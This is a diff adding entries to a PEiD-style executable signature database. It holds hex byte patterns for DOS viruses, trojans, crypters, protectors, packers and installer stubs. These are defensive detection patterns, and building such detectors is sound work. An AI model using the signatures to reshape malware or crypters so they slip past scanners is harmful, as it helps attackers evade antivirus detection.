+signature = E8 1C 00 8D 9E 41 01 40 3E 8B 96 14 03 B9 EA 00 87 DB F7 D0 31 17 83 C3 02 E2 F7 C3
+ep_only = true
+
+[Vx: Hafen.1641]
+signature = E8 ?? ?? 01 ?? ?? ?? CE CC 25 ?? ?? 25 ?? ?? 25 ?? ?? 40 51 D4 ?? ?? ?? CC 47 CA ?? ?? 46 8A CC 44 88 CC
+ep_only = true
+
+[Vx: Hafen.809]
+signature = E8 ?? ?? 1C ?? 81 EE ?? ?? 50 1E 06 8C C8 8E D8 06 33 C0 8E C0 26 ?? ?? ?? 07 3D
+ep_only = true
+
+[Vx: Haryanto]
+signature = 81 EB 2A 01 8B 0F 1E 5B 03 CB 0E 51 B9 10 01 51 CB
+ep_only = true
+
+[Vx: Heloween.1172]
+signature = E8 ?? ?? 5E 81 EE ?? ?? 56 50 06 0E 1F 8C C0 01 ?? ?? 01 ?? ?? 80 ?? ?? ?? ?? 8B ?? ?? A3 ?? ?? 8A ?? ?? A2 ?? ?? B8 ?? ?? CD 21 3D
+ep_only = true
+
+[Vx: Horse.1776]
+signature = E8 ?? ?? 5D 83 ?? ?? 06 1E 26 ?? ?? ?? ?? BF ?? ?? 1E 0E 1F 8B F7 01 EE B9 ?? ?? FC F3 A6 1F 1E 07
+ep_only = true
+
+[Vx: Hymn.1865]
+signature = E8 ?? ?? 5E 83 EE 4C FC 2E ?? ?? ?? ?? 4D 5A ?? ?? FA 8B E6 81 ?? ?? ?? FB 3B ?? ?? ?? ?? ?? 2E ?? ?? ?? ?? ?? 50 06 56 1E 0E 1F B8 00 C5 CD 21
+ep_only = true
+
+[Vx: Igor]
+signature = 1E B8 CD 7B CD 21 81 FB CD 7B 75 03 E9 87 00 33 DB 0E 1F 8C
+ep_only = true
+
+[Vx: Involuntary.1349]
+signature = ?? BA ?? ?? B9 ?? ?? 8C DD ?? 8C C8 ?? 8E D8 8E C0 33 F6 8B FE FC ?? ?? AD ?? 33 C2 AB
+ep_only = true
+
+[Vx: KBDflags.1024]
+signature = 8B EC 2E 89 2E 24 03 BC 00 04 8C D5 2E 89 2E 22
+ep_only = true
+
+[Vx: Keypress.1212]
+signature = E8 ?? ?? E8 ?? ?? E8 ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? EA ?? ?? ?? ?? 1E 33 DB 8E DB BB
+ep_only = true
+
+[Vx: Kuku.448]
+signature = AE 75 ED E2 F8 89 3E ?? ?? BA ?? ?? 0E 07 BF ?? ?? EB
+ep_only = true
+
+[Vx: Kuku.886]
+signature = 06 1E 50 8C C8 8E D8 BA 70 03 B8 24 25 CD 21 ?? ?? ?? ?? ?? 90 B4 2F CD 21 53
+ep_only = true
+
+[Vx: Modification of Hi.924]
+signature = 50 53 51 52 1E 06 9C B8 21 35 CD 21 53 BB ?? ?? 26 ?? ?? 49 48 5B
+ep_only = true
+
+[Vx: MTE (non-encrypted)]
+signature = F7 D9 80 E1 FE 75 02 49 49 97 A3 ?? ?? 03 C1 24 FE 75 02 48
+ep_only = true
+
+[Vx: Ncu-Li.1688]
+signature = 0E 1E B8 55 AA CD 21 3D 49 4C 74 ?? 0E 0E 1F 07 E8
+ep_only = true
+
+[Vx: Necropolis]
+signature = 50 FC AD 33 C2 AB 8B D0 E2 F8
+ep_only = true
+
+[Vx: Necropolis.1963]
+signature = B4 30 CD 21 3C 03 ?? ?? B8 00 12 CD 2F 3C FF B8 ?? ?? ?? ?? B4 4A BB 40 01 CD 21 ?? ?? FA 0E 17 BC ?? ?? E8 ?? ?? FB A1 ?? ?? 0B C0
+ep_only = true
+
+[Vx: Noon.1163]
+signature = E8 ?? ?? 5B 50 56 B4 CB CD 21 3C 07 ?? ?? 81 ?? ?? ?? 2E ?? ?? 4D 5A ?? ?? BF 00 01 89 DE FC
+ep_only = true
+
+[Vx: November 17.768]
+signature = E8 ?? ?? 5E 81 EE ?? ?? 50 33 C0 8E D8 80 3E ?? ?? ?? 0E 1F ?? ?? FC
+ep_only = true
+
+[Vx: Number One]
+signature = F9 07 3C 53 6D 69 6C 65 3E E8
+ep_only = true
+
+[Vx: Phoenix.927]
+signature = E8 00 00 5E 81 C6 ?? ?? BF 00 01 B9 04 00 F3 A4 E8
+ep_only = true
+
+[Vx: Predator.2448]
+signature = 0E 1F BF ?? ?? B8 ?? ?? B9 ?? ?? 49 ?? ?? ?? ?? 2A C1 4F 4F ?? ?? F9 CC
+ep_only = true
+
+[Vx: Quake.518]
+signature = 1E 06 8C C8 8E D8 ?? ?? ?? ?? ?? ?? ?? B8 21 35 CD 21 81
+ep_only = true
+
+[Vx: SK]
+signature = CD 20 B8 03 00 CD 10 51 E8 00 00 5E 83 EE 09
+ep_only = true
+
+[Vx: Slowload]
+signature = 03 D6 B4 40 CD 21 B8 02 42 33 D2 33 C9 CD 21 8B D6 B9 78 01
+ep_only = true
+
+[Vx: Sonik Youth]
+signature = 8A 16 02 00 8A 07 32 C2 88 07 43 FE C2 81 FB
+ep_only = true
+
+[Vx: Spanz]
+signature = E8 00 00 5E 81 EE ?? ?? 8D 94 ?? ?? B4 1A CD 21 C7 84
+ep_only = true
+
+[Vx: SYP]
+signature = 47 8B C2 05 1E 00 52 8B D0 B8 02 3D CD 21 8B D8 5A
+ep_only = true
+
+[VX: Tibs/Zhelatin "StormWorm" variant]
+signature = FF 74 24 1C 58 8D 80 ?? ?? 77 04 50 68 62 34 35 04 E8
+ep_only = true
+
+[Vx: TravJack.883]
+signature = EB ?? 9C 9E 26 ?? ?? 51 04 ?? 7D ?? 00 ?? 2E ?? ?? ?? ?? 8C C8 8E C0 8E D8 80 ?? ?? ?? ?? 74 ?? 8A ?? ?? ?? BB ?? ?? 8A ?? 32 C2 88 ?? FE C2 43 81
+ep_only = true
+
+[Vx: Trivial.25]
+signature = B4 4E FE C6 CD 21 B8 ?? 3D BA ?? 00 CD 21 93 B4 40 CD
+ep_only = true
+
+[Vx: Trivial.46]
+signature = B4 4E B1 20 BA ?? ?? CD 21 BA ?? ?? B8 ?? 3D CD 21
+ep_only = true
+
+[Vx: Trojan.Telefoon]
+signature = 60 1E E8 3B 01 BF CC 01 2E 03 3E CA 01 2E C7 05
+ep_only = true
+
+[Vx: Uddy.2617]
+signature = 2E ?? ?? ?? ?? ?? 2E ?? ?? ?? ?? ?? 2E ?? ?? ?? 8C C8 8E D8 8C ?? ?? ?? 2B ?? ?? ?? 03 ?? ?? ?? A3 ?? ?? A1 ?? ?? A3 ?? ?? A1 ?? ?? A3 ?? ?? 8C C8 2B ?? ?? ?? 03 ?? ?? ?? A3 ?? ?? B8 AB 9C CD 2F 3D 76 98
+ep_only = true
+
+[Vx: VCL]
+signature = AC B9 00 80 F2 AE B9 04 00 AC AE 75 ?? E2 FA 89
+ep_only = true
+
+[Vx: VCL (encrypted)]
+signature = 01 B9 ?? ?? 81 34 ?? ?? 46 46 E2 F8 C3
+ep_only = true
+
+[Vx: VCL (encrypted)]
+signature = 01 B9 ?? ?? 81 35 ?? ?? 47 47 E2 F8 C3
+ep_only = true
+
+[Vx: VirusConstructor(IVP).based]
+signature = E9 ?? ?? E8 ?? ?? 5D ?? ?? ?? ?? ?? 81 ED ?? ?? ?? ?? ?? ?? E8 ?? ?? 81 FC ?? ?? ?? ?? 8D ?? ?? ?? BF ?? ?? 57 A4 A5
+ep_only = true
+
+[Vx: VirusConstructor.based]
+signature = BB ?? ?? B9 ?? ?? 2E ?? ?? ?? ?? 43 43 ?? ?? 8B EC CC 8B ?? ?? 81 ?? ?? ?? 06 1E B8 ?? ?? CD 21 3D ?? ?? ?? ?? 8C D8 48 8E D8
+ep_only = true
+
+[Vx: VirusConstructor.based]
+signature = E8 ?? ?? 5D 81 ?? ?? ?? 06 1E E8 ?? ?? E8 ?? ?? ?? ?? 2E ?? ?? ?? ?? ?? ?? B4 4A BB FF FF CD 21 83 ?? ?? B4 4A CD 21
+ep_only = true
+
+[Vx: XPEH.4768]
+signature = E8 ?? ?? 5B 81 ?? ?? ?? 50 56 57 2E ?? ?? ?? ?? ?? 2E ?? ?? ?? ?? ?? ?? B8 01 00 50 B8 ?? ?? 50 E8
+ep_only = true
+
+[Vx: XRCV.1015]
+signature = E8 ?? ?? 5E 83 ?? ?? 53 51 1E 06 B4 99 CD 21 80 FC 21 ?? ?? ?? ?? ?? 33 C0 50 8C D8 48 8E C0 1F A1 ?? ?? 8B
+ep_only = true
+
+[W32.Jeefo (PE File Infector)]
+signature = 55 89 E5 83 EC 08 83 C4 F4 6A 02 A1 C8 ?? ?? ?? FF D0 E8 ?? ?? ?? ?? C9 C3
+ep_only = true
+
+[WARNING -> TROJAN -> ADinjector]
+signature = 90 61 BE 00 20 44 00 8D BE 00 F0 FB FF C7 87 9C E0 04 00 6A F0 8A 5E 57 83 CD FF EB 0E
+ep_only = true
+
+[WARNING -> TROJAN -> HuiGeZi]
+signature = 55 8B EC 81 C4 ?? FE FF FF 53 56 57 33 C0 89 85 ?? FE FF FF
+ep_only = true
+
+[WARNING -> TROJAN -> RobinPE]
+signature = 60 6A 00 6A 20 6A 02 6A 00 6A 03 68 00 00 00
+ep_only = true
+
+[WARNING -> TROJAN -> XiaoHui]
+signature = 60 9C E8 00 00 00 00 5D B8 ?? 85 40 00 2D ?? 85 40 00
+ep_only = true
+
+[Warning! may be SimbyOZ polycryptor by 3xpl01t ver 2.xx (25.03.2007 22:00)]
+signature = 57 57 8D 7C 24 04 50 B8 00 D0 17 13 AB 58 5F C3 00 00
+ep_only = true
+
+[WebCops [DLL] -> LINK Data Security]
+signature = A8 BE 58 DC D6 CC C4 63 4A 0F E0 02 BB CE F3 5C 50 23 FB 62 E7 3D 2B
+ep_only = true
+
+[WebCops [EXE] -> LINK Data Security]
+signature = EB 03 05 EB 02 EB FC 55 EB 03 EB 04 05 EB FB EB 53 E8 04 00 00 00 72
+ep_only = true
+
+[Werus Crypter 1.0 - by Kas]
+signature = BB E8 12 40 00 80 33 05 E9 7D FF FF FF
+ep_only = true
+
+[Werus Crypter 1.0 -> Kas]
+signature = 68 98 11 40 00 6A 00 E8 50 00 00 00 C9 C3 ED B3 FE FF FF 6A 00 E8 0C 00 00 00 FF 25 80 10 40 00 FF 25 84 10 40 00 FF 25 88 10 40 00 FF 25 8C 10 40 00 FF 25 90 10 40 00 FF 25 94 10 40 00 FF 25 98 10 40 00 FF 25 9C 10 40 00 FF 25 A0 10 40 00 FF 25 A4 10 40 00 FF 25 A8 10 40 00 FF 25 B0 10 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 BB E8 12 40 00 80 33 05 E9 7D FF FF FF
+ep_only = false
+
+[WIBU-Key V4.10A -> http://wibu.com/us/]
+signature = F7 05 ?? ?? ?? ?? FF 00 00 00 75 12
+ep_only = true
+
+[Wind of Crypt 1.0 - by DarkPressure]
+signature = 55 8B EC 83 C4 EC 53 ?? ?? ?? ?? 89 45 EC B8 64 40 00 10 E8 28 EA FF FF 33 C0 55 68 CE 51 00 10 64 ?? ?? ?? ?? 20 6A 00 68 80 00 00 00 6A 03 6A 00 6A 01 68 00 00 00 80 8D 55 EC 33 C0 E8 F6 DB FF FF 8B 45 EC E8 12 E7 FF FF 50 E8 3C EA FF FF 8B D8 83 FB FF 0F 84 A6 00 00 00 6A 00 53 E8 41 EA FF FF 8B F0 81 EE 00 5E 00 00 6A 00 6A 00 68 00 5E 00 00 53 E8 52 EA FF FF B8 F4 97 00 10 8B D6 E8 2E E7 FF FF B8 F8 97 00 10 8B D6 E8 22 E7 FF FF 8B C6 E8 AB D8 FF FF 8B F8 6A 00 68 F0 97 00 10 56 A1 F4 97 00 10 50 53 E8 05 EA FF FF 53 E8 CF E9 FF FF B8 FC 97 00 10 BA E8 51 00 10 E8 74 EA FF FF A1 F4 97 00 10 85 C0 74 05 83 E8 04 8B 00 50 B9 F8 97 00 10 B8 FC 97 00 10 8B 15 F4 97 00 10 E8 D8 EA FF FF B8 FC 97 00 10 E8 5A EB FF FF 8B CE 8B 15 F8 97 00 10 8B C7 E8 EB E9 FF FF 8B C7 85 C0 74 05 E8 E4 EB FF FF 33 C0 5A 59 59 64 89 10 68 D5 51 00 10 8D 45 EC E8 BB E5 FF FF C3 E9 A9 DF FF FF EB F0 5F 5E 5B E8 B7 E4 FF FF 00 00 00 FF FF FF FF 0A 00 00 00 63 5A 6C 56 30 55 6C 6B 70 4D
+ep_only = true
+
+[Winkript v1.0]
+signature = 33 C0 8B B8 00 ?? ?? ?? 8B 90 04 ?? ?? ?? 85 FF 74 1B 33 C9 50 EB 0C 8A 04 39 C0 C8 04 34 1B 88 04 39 41 3B CA 72 F0 58
+ep_only = true
+
+[WinKript v1.0 -> Mr. Crimson]
+signature = 33 C0 8B B8 00 ?? ?? ?? 8B 90 04 ?? ?? ?? 85 FF 74 1B 33 C9 50 EB 0C 8A 04 39 C0 C8 04 34 1B 88 04 39 41 3B CA 72 F0 58 83 C0 08 EB D5 61 E9 ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ep_only = true
+
+[WinRAR 32-bit SFX Module]
+signature = E9 ?? ?? 00 00 00 00 00 00 90 90 90 ?? ?? ?? ?? ?? ?? 00 ?? 00 ?? ?? ?? ?? ?? FF
+ep_only = true
+
+[WinUpack v0.30 beta -> By Dwing]
+signature = E9 ?? ?? ?? ?? 42 79 44 77 69 6E 67 40 00 00 00 50 45 00 00
+ep_only = false
+
+[WinUpack v0.30 beta -> By Dwing]
+signature = E9 ?? ?? ?? ?? 42 79 44 77 69 6E 67 40 00 00 00 50 45 00 00 4C 01 02
+ep_only = false
+
+[WinUpack v0.39 final (relocated image base) -> By Dwing (c)2005 (h2)]
+signature = 60 E8 09 00 00 00 ?? ?? ?? 00 E9 06 02 00 00 33 C9 5E 87 0E E3 F4 2B F1 8B DE AD 2B D8 AD 03 C3 50 97 AD 91 F3 A5 5E AD 56 91 01 1E AD E2 FB AD 8D 6E 10 01 5D 00 8D 7D 1C B5 ?? F3 AB 5E AD 53 50 51 97 58 8D 54 85 5C FF 16 72 57 2C 03 73 02 B0 00 3C 07 72
+ep_only = true
+
+[WinUpack v0.39 final -> By Dwing (c)2005 (h1)]
+signature = BE B0 11 ?? ?? AD 50 FF 76 34 EB 7C 48 01 ?? ?? 0B 01 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 18 10 00 00 10 00 00 00 00 ?? ?? ?? 00 00 ?? ?? 00 10 00 00 00 02 00 00 04 00 00 00 00 00 39 00 04 00 00 00 00 00 00 00 00 ?? ?? ?? 00 02 00 00 00 00 00 00
+ep_only = true
+
+[WinZip (32-bit) 6.x]
+signature = FF 15 FC 81 40 00 B1 22 38 08 74 02 B1 20 40 80 38 00 74 10
+ep_only = true
+
+[WinZip 32-bit SFX v6.x module]
+signature = FF 15 ?? ?? ?? 00 B1 22 38 08 74 02 B1 20 40 80 38 00 74 10 38 08 74 06 40 80 38 00 75 F6 80 38 00 74 01 40 33 C9 ?? ?? ?? ?? FF 15
+ep_only = true
+
+[WinZip 32-bit SFX v8.x module]
+signature = 53 FF 15 ?? ?? ?? 00 B3 22 38 18 74 03 80 C3 FE 8A 48 01 40 33 D2 3A CA 74 0A 3A CB 74 06 8A 48 01 40 EB F2 38 10 74 01 40 ?? ?? ?? ?? FF 15
+ep_only = true
+
+[WinZip Self-Extractor 2.2 personal edition -> WinZip Computing]
+signature = 53 FF 15 58 70 40 00 B3 22 38 18 74 03 80 C3 FE 40 33 D2 8A 08 3A CA 74 10 3A CB 74 07 40 8A 08 3A CA 75 F5 38 10 74 01 40 52 50 52 52 FF 15 5C 70 40 00 50 E8 15 FB FF FF 50 FF 15 8C 70 40 00 5B
+ep_only = true
+
+[Wise Installer Stub]
+signature = 55 8B EC 81 EC 78 05 00 00 53 56 BE 04 01 00 00 57 8D 85 94 FD FF FF 56 33 DB 50 53 FF 15 34 20 40 00 8D 85 94 FD FF FF 56 50 8D 85 94 FD FF FF 50 FF 15 30 20 40 00 8B 3D 2C 20 40 00 53 53 6A 03 53 6A 01 8D 85 94 FD FF FF 68 00 00 00 80 50 FF D7 83 F8 FF
+ep_only = true
+
+[Wise Installer Stub]
+signature = 55 8B EC 81 EC ?? 04 00 00 53 56 57 6A ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? 40 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 80 ?? 20
+ep_only = true
+
+[Wise Installer Stub]
+signature = 55 8B EC 81 EC ?? ?? 00 00 53 56 57 6A 01 5E 6A 04 89 75 E8 FF 15 ?? 40 40 00 FF 15 ?? 40 40 00 8B F8 89 7D ?? 8A 07 3C 22 0F 85 ?? 00 00 00 8A 47 01 47 89 7D ?? 33 DB 3A C3 74 0D 3C 22 74 09 8A 47 01 47 89 7D ?? EB EF 80 3F 22 75 04 47 89 7D ?? 80 3F 20
+ep_only = false
+
+[Wise Installer Stub v1.10.1029.1]
+signature = 55 8B EC 81 EC 40 0F 00 00 53 56 57 6A 04 FF 15 F4 30 40 00 FF 15 74 30 40 00 8A 08 89 45 E8 80 F9 22 75 48 8A 48 01 40 89 45 E8 33 F6 84 C9 74 0E 80 F9 22 74 09 8A 48 01 40 89 45 E8 EB EE 80 38 22 75 04 40 89 45 E8 80 38 20 75 09 40 80 38 20 74 FA 89 45
+ep_only = true
+
+[WWPACK v3.00, v3.01 (Extractable)]
+signature = B8 ?? ?? 8C CA 03 D0 8C C9 81 C1 ?? ?? 51 6A ?? 06 06 8C D3 83 ?? ?? 53 6A ?? FC
+ep_only = true
+
+[WWPACK v3.00, v3.01 (Relocations pack)]
+signature = BE ?? ?? BA ?? ?? BF ?? ?? B9 ?? ?? 8C CD 8E DD 81 ED ?? ?? 06 06 8B DD 2B DA 8B D3 FC
+ep_only = true
+
+[WWPACK v3.02, v3.02a (Extractable)]
+signature = B8 ?? ?? 8C CA 03 D0 8C C9 81 C1 ?? ?? 51 33 C9 B1 ?? 51 06 06 BB ?? ?? 53 8C D3
+ep_only = true
+
+[WWPACK v3.02, v3.02a, v3.04 (Relocations pack)]
+signature = BE ?? ?? BF ?? ?? B9 ?? ?? 8C CD 81 ED ?? ?? 8B DD 81 EB ?? ?? 8B D3 FC FA 1E 8E DB 01 15 33 C0 2E AC
+ep_only = true
+
+[WWPACK v3.03]
+signature = B8 ?? ?? 8C CA 03 D0 8C C9 81 C1 ?? ?? 51 B9 ?? ?? 51 06 06 BB ?? ?? 53
+ep_only = true
+
+[WWPACK v3.05c4 (Extr. Passw.check. Vir. shield)]
+signature = 03 05 C0 1A B8 ?? ?? 8C CA 03 D0 8C C9 81 C1 ?? ?? 51 B9 ?? ?? 51 06 06 B1 ?? 51 8C D3
+ep_only = true
+
+[WWPACK v3.05c4 (Extractable + Password checking)]
+signature = 03 05 80 1A B8 ?? ?? 8C CA 03 D0 8C C9 81 C1 ?? ?? 51 B9 ?? ?? 51 06 06 B1 ?? 51 8C D3
+ep_only = true
+
+[WWPACK v3.05c4 (Extractable + Virus Shield)]
+signature = 03 05 40 1A B8 ?? ?? 8C CA 03 D0 8C C9 81 C1 ?? ?? 51 B9 ?? ?? 51 06 06 B1 ?? 51 8C D3
+ep_only = true
+
+[WWPACK v3.05c4 (Extractable)]
+signature = 03 05 00 1A B8 ?? ?? 8C CA 03 D0 8C C9 81 C1 ?? ?? 51 B9 ?? ?? 51 06 06 B1 ?? 51 8C D3
+ep_only = true
+
+[WWPACK v3.05c4 (Modified)]
+signature = B8 ?? ?? 8C CA 03 D0 8C C9 81 C1 ?? ?? 51 B9 ?? ?? 51 06 06 B1 ?? 51 8C D3
+ep_only = true
+
+[WWPACK v3.05c4 (Unextr. Passw.check. Vir. shield)]
+signature = 03 05 C0 1B B8 ?? ?? 8C CA 03 D0 8C C9 81 C1 ?? ?? 51 B9 ?? ?? 51 06 06 B1 ?? 51 8C D3
+ep_only = true
+
+[WWPACK v3.05c4 (Unextractable + Password checking)]
+signature = 03 05 80 1B B8 ?? ?? 8C CA 03 D0 8C C9 81 C1 ?? ?? 51 B9 ?? ?? 51 06 06 B1 ?? 51 8C D3
+ep_only = true
+
+[WWPACK v3.05c4 (Unextractable + Virus Shield)]
+signature = 03 05 40 1B B8 ?? ?? 8C CA 03 D0 8C C9 81 C1 ?? ?? 51 B9 ?? ?? 51 06 06 B1 ?? 51 8C D3
+ep_only = true
+
+[WWPACK v3.05c4 (Unextractable)]
+signature = 03 05 00 1B B8 ?? ?? 8C CA 03 D0 8C C9 81 C1 ?? ?? 51 B9 ?? ?? 51 06 06 B1 ?? 51 8C D3
+ep_only = true
+
+[WWPack32 v1.00, v1.11, v1.12, v1.20]
+signature = 53 55 8B E8 33 DB EB 60 0D 0A 0D 0A 57 57 50 61 63 6B 33 32
+ep_only = true
+
+[WWPack32 v1.x]
+signature = 53 55 8B E8 33 DB EB 60
+ep_only = true
+
+[X-Hider 1.0 -> GlobaL]
+signature = 55 8B EC 83 C4 EC 33 C0 89 45 EC B8 54 20 44 44 E8 DF F8 FF FF 33 C0 55 68 08 21 44 44 64 FF 30 64 89 20 8D 55 EC B8 1C 21 44 44 E8 E0 F9 FF FF 8B 55 EC B8 40 ?? ?? 44 E8 8B F5 FF FF 6A 00 6A 00 6A 02 6A 00 6A 01 68 00 00 00 40 A1 40 ?? ?? 44 E8 7E F6 FF FF 50 E8 4C F9 FF FF 6A 00 50 E8 4C F9 FF FF A3 28 ?? ?? 44 E8 CE FE FF FF 33 C0 5A 59 59 64 89 10 68 0F 21 44 44 8D 45 EC E8 F1 F4 FF FF C3 E9 BB F2 FF FF EB F0 E8 FC F3 FF FF FF FF FF FF 0E 00 00 00 63 3A 5C 30 30 30 30 30 30 31 2E 64 61 74 00
+ep_only = true
+
+[X-Hider 1.0 -> GlobaL]
+signature = 85 D2 74 23 8B 4A F8 41 7F 1A 50 52 8B 42 FC E8 30 00 00 00 89 C2 58 52 8B 48 FC E8 48 FB FF FF 5A 58 EB 03 FF 42 F8 87 10 85 D2 74 13 8B 4A F8 49 7C 0D FF 4A F8 75 08 8D 42 F8 E8 5C FA FF FF C3 8D 40 00 85 C0 7E 24 50 83 C0 0A 83 E0 FE 50 E8 2F FA FF FF 5A 66 C7 44 02 FE 00 00 83 C0 08 5A 89 50 FC C7 40 F8 01 00 00 00 C3 31 C0 C3 90
+ep_only = false
+
+[X-Pack v1.4.2]
+signature = 72 ?? C3 8B DE 83 ?? ?? C1 ?? ?? 8C D8 03 C3 8E D8 8B DF 83 ?? ?? C1 ?? ?? 8C C0 03 C3 8E C0 C3
+ep_only = false
+
+[X-PEOR v0.99b]
+signature = E8 00 00 00 00 5D 8B CD 81 ED 7A 29 40 00 89 AD 0F 6D 40 00
+ep_only = true
+
+[X-PEOR v0.99b]
+signature = E8 ?? ?? ?? ?? 5D 8B CD 81 ED 7A 29 40 ?? 89 AD 0F 6D 40
+ep_only = true
+
+[XCR v0.12]
+signature = 60 9C E8 ?? ?? ?? ?? 8B DD 5D 81 ED ?? ?? ?? ?? 89 9D
+ep_only = true
+
+[XCR v0.13]
+signature = 93 71 08 ?? ?? ?? ?? ?? ?? ?? ?? 8B D8 78 E2 ?? ?? ?? ?? 9C 33 C3 ?? ?? ?? ?? 60 79 CE ?? ?? ?? ?? E8 01 ?? ?? ?? ?? 83 C4 04 E8 AB FF FF FF ?? ?? ?? ?? 2B E8 ?? ?? ?? ?? 03 C5 FF 30 ?? ?? ?? ?? C6 ?? EB
+ep_only = true
+
+[XJ / XPAL -> LiNSoN]
+signature = 55 8B EC 6A FF 68 ?? ?? 40 00 68 ?? ?? 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 44 53 56 57 66 9C
+ep_only = true
+
+[XPack 1.52 - 1.64]
+signature = 8B EC FA 33 C0 8E D0 BC ?? ?? 2E ?? ?? ?? ?? 2E ?? ?? ?? ?? EB
+ep_only = true
+
+[XPack 1.67]
+signature = B8 8C D3 15 33 75 81 3E E8 0F 00 9A E8 F9 FF 9A 9C EB 01 9A 59 80 CD 01 51 9D EB
+ep_only = true
+
+[xPEP 0.3x -> xIkUg]
+signature = 55 53 56 51 52 57 E8 16 00 00 00
+ep_only = true
+
+[Xtreme-Protector v1.05]
+signature = E9 ?? ?? 00 00 00 00 00 00 00 00
+ep_only = true
+
+[Xtreme-Protector v1.06]
+signature = B8 ?? ?? ?? 00 B9 75 ?? ?? 00 50 51 E8 05 00 00 00 E9 4A 01 00 00 60 8B 74 24 24 8B 7C 24 28 FC B2 80 8A 06 46 88 07 47 BB 02 00 00 00 02 D2 75 05 8A 16 46 12 D2 73 EA 02 D2 75 05 8A 16 46 12 D2 73 4F 33 C0 02 D2 75 05 8A 16 46 12 D2 0F 83 DF 00 00 00 02
+ep_only = true
+
+[XXPack 0.1 -> bagie]
+signature = E8 04 00 00 00 83 60 EB 0C 5D EB 05 45 55 EB 04 B8 EB F9 00 C3 E8 00 00 00 00 5D EB 01 00 81 ED 5E 1F 40 00 EB 02 83 09 8D B5 EF 1F 40 00 EB 02 83 09 BA A3 11 00 00 EB 00 68 00 ?? ?? ?? C3
+ep_only = true
+
+[y0da's Crypter v1.0]
+signature = 60 E8 00 00 00 00 5D 81 ED E7 1A 40 00 E8 A1 00 00 00 E8 D1 00 00 00 E8 85 01 00 00 F7 85
+ep_only = true
+
+[y0da's Crypter v1.1]
+signature = 60 E8 00 00 00 00 5D 81 ED 8A 1C 40 00 B9 9E 00 00 00 8D BD 4C 23 40 00 8B F7 33
+ep_only = true
+
+[y0da's Crypter v1.2]
+signature = 60 E8 00 00 00 00 5D 81 ED F3 1D 40 00 B9 7B 09 00 00 8D BD 3B 1E 40 00 8B F7 AC ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? AA E2 CC
+ep_only = true
+
+[y0da's Crypter v1.x / Modified]
+signature = 60 E8 00 00 00 00 5D 81 ED ?? ?? ?? ?? B9 ?? ?? 00 00 8D BD ?? ?? ?? ?? 8B F7 AC
+ep_only = true
+
+[yC v1.3 by Ashkbiz Danehkar]
+signature = 55 8B EC 81 EC C0 00 00 00 53 56 57 8D BD 40 FF FF FF B9 30 00 00 00 B8 CC CC CC CC F3 AB 60 E8 00 00 00 00 5D 81 ED 84 52 41 00 B9 75 5E 41 00 81 E9 DE 52 41 00 8B D5 81 C2 DE 52 41 00 8D 3A 8B F7 33 C0 EB 04 90 EB 01 C2 AC
+ep_only = false
+
+[yoda's Crypter 1.3 -> Ashkbiz Danehkar]
+signature = 55 8B EC 53 56 57 60 E8 00 00 00 00 5D 81 ED 6C 28 40 00 B9 5D 34 40 00 81 E9 C6 28 40 00 8B D5 81 C2 C6 28 40 00 8D 3A 8B F7 33 C0 EB 04 90 EB 01 C2 AC
+ep_only = true
+
+[yoda's Protector 1.02 - 1.03 -> Ashkbiz Danehkar]
+signature = E8 03 00 00 00 EB 01 ?? BB 55 00 00 00 E8 03 00 00 00 EB 01 ?? E8 8F 00 00 00 E8 03 00 00 00 EB 01 ?? E8 82 00 00 00 E8 03 00 00 00 EB 01 ?? E8 B8 00 00 00 E8 03 00 00 00 EB 01 ?? E8 AB 00 00
+ep_only = true
+
+[yoda's Protector 1.02 -> Ashkibiz Danehlar]
+signature = E8 03 00 00 00 EB 01 ?? BB 55 00 00 00 E8 03 00 00 00 EB 01 ?? E8 8F 00 00 00 E8 03 00 00 00 EB 01 ?? E8 82 00 00 00 E8 03 00 00 00 EB 01 ?? E8 B8 00 00 00 E8 03 00 00 00 EB 01 ?? E8 AB 00 00 00 E8 03 00 00 00 EB 01 ?? 83 FB 55 E8 03 00 00 00 EB 01 ?? 75
+ep_only = true
+
+[yoda's Protector 1.0x -> Ashkbiz Danehkar]
+signature = 55 8B EC 53 56 57 E8 03 00 00 00 EB 01
+ep_only = true
+
+[yoda's Protector v1.01 -> Ashkbiz Danehkar]
+signature = 55 8B EC 53 56 57 E8 03 00 00 00 EB 01 ?? E8 86 00 00 00 E8 03 00 00 00 EB 01 ?? E8 79 00 00 00 E8 03 00 00 00 EB 01 ?? E8 A4 00 00 00 E8 03 00 00 00 EB 01 ?? E8 97 00 00 00 E8 03 00 00 00 EB 01 ?? E8 2D 00 00 00 E8 03 00 00 00 EB 01 ?? 60 E8 00 00 00 00
+ep_only = true
+
+[yoda's Protector V1.01 -> Ashkbiz Danehkar]
+signature = 55 8B EC 53 56 57 E8 03 00 00 00 EB 01 ?? E8 86 00 00 00 E8 03 00 00 00 EB 01 ?? E8 79 00 00 00 E8 03 00 00 00 EB 01 ?? E8 A4 00 00 00 E8 03 00 00 00 EB 01 ?? E8 97 00 00 00 E8 03 00 00 00 EB 01 ?? E8 2D 00 00 00 E8 03 00 00 00 EB 01 ?? 60 E8 00 00 00 00 5D 81 ED D5 E4 41 00 8B D5 81 C2 23 E5 41 00 52 E8 01 00 00 00 C3 C3 E8 03 00 00 00 EB 01 ?? E8 0E 00 00 00 E8 D1 FF FF FF C3 E8 03 00 00 00 EB 01 ?? 33 C0 64 FF 30 64 89 20 CC C3 E8 03 00 00 00 EB 01 ?? 33 C0 64 FF 30 64 89 20 CC C3
